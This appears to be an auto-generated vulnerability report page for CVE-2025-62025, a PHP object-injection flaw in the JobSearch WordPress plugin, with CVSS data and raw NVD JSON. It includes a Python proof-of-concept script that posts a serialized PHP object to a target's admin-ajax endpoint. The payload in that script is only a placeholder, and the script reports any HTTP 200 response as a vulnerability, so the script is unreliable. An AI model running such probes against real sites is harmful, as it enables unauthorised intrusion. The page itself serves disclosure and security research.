Security Vulnerability Report
中文
CVE-2025-62025 CVSS 9.8 CRITICAL

CVE-2025-62025

Published: 2025-10-22 15:16:04
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in eyecix JobSearch wp-jobsearch.This issue affects JobSearch: from n/a through < 3.0.8.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

JobSearch插件 < 3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62025 PoC - WordPress JobSearch Plugin PHP Object Injection # Target: WordPress with wp-jobsearch plugin < 3.0.8 def check_vulnerability(url): """Check if target is vulnerable to CVE-2025-62025""" # Common endpoint patterns for JobSearch plugin endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/posts', '/?s=1&search_submit=Search' ] # Malicious serialized payload - PHP object injection # This is a placeholder payload structure payload = 'O:31:"wp_jobsearch_Popchain_Class":1:{s:4:"data";s:XXX:"...malicious_data...";}' for endpoint in endpoints: target = url.rstrip('/') + endpoint try: headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } data = { 'action': 'jobsearch_job_apply_online', 'post_id': '1', 'candidate_id': payload } response = requests.post(target, data=data, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f'[+] Potential vulnerability detected at {target}') print(f'[+] Response: {response.text[:500]}') return True except Exception as e: print(f'[-] Error testing {target}: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-62025.py <target_url>') print('Example: python cve-2025-62025.py http://target.com') sys.exit(1) target_url = sys.argv[1] print(f'[*] Scanning {target_url} for CVE-2025-62025...') check_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62025", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:03.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in eyecix JobSearch wp-jobsearch.This issue affects JobSearch: from n/a through < 3.0.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-jobsearch/vulnerability/wordpress-jobsearch-plugin-3-0-8-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}